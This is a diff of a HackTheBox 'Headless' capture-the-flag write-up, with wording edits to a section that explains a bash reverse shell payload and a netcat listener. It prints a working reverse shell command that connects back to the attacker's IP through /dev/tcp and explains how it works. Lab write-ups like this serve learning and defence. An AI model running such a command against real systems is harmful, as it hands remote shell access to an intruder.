3v401/HackTheBox/Headless/README.md

 /bin/bash -c 'exec bash -i >& /dev/tcp/{IP}/1111 0>&1'
 ```

 Make the payload executable with `chmod +x payload.sh`.
-The content:
+The content of the payload:

 1. `/bin/bash -c`: Tells the CLI to run the following command using the bash shell.
-2. `'exec bash -i >& /dev/tcp/{IP}/1111 0>&1'`: The core of the reverse shell command. `exec bash -i` This starts an interactive bash shell. `/dev/tcp/` is a Bash feature that allows TCP connections to be treated like files, when a program writes to this path it actually sends data over the network to the specified IP address and port ({IP}/1111). `0>&1`makes the standard input of the Bash shell read from the TCP connection.
+2. `'exec bash -i >& /dev/tcp/{IP}/1111 0>&1'`: The core of the reverse shell command. `exec bash -i` starts an interactive bash shell. `/dev/tcp/` is a Bash feature that allows TCP connections to be treated like files, when a program writes to this path it actually sends data over the network to the specified IP address and port ({IP}/1111). `0>&1` makes the standard input of the Bash shell read from the TCP connection.

-The IP address must be your IP address (mine is `10.10.14.10`) and the /1111 is the port we are going to set (you can set whichever you want to) for a netcat listener.
+The IP address must be your IP address (mine is `10.10.14.108`) and the /1111 is the port we are going to set (you can set whichever you want to) for a netcat listener.

 #### Netcat

-Netcat network tool for reading from and writing to network connections using TCP or UDP protocols.
+Netcat is a network tool for reading from (and writing to) network connections using TCP or UDP protocols.
 Some of its applications include:

 1. Port Scanning & Banner Grabbing: Checking open ports on a network & retrieving information about a service running on an open port.
 2. File Transfers: Sending and receiving files over a network connection.
 3. Creating Backdoors: Setting up shells on target machines (out goal).
-4. Debugging and Testing Network Services: Sending and receiving arbitrary data to and from network services for testing.
+4. Debugging and Testing Network Services: Sending and receiving arbitrary data to (and from) network services for testing.

 To setup the netcat listener we execute: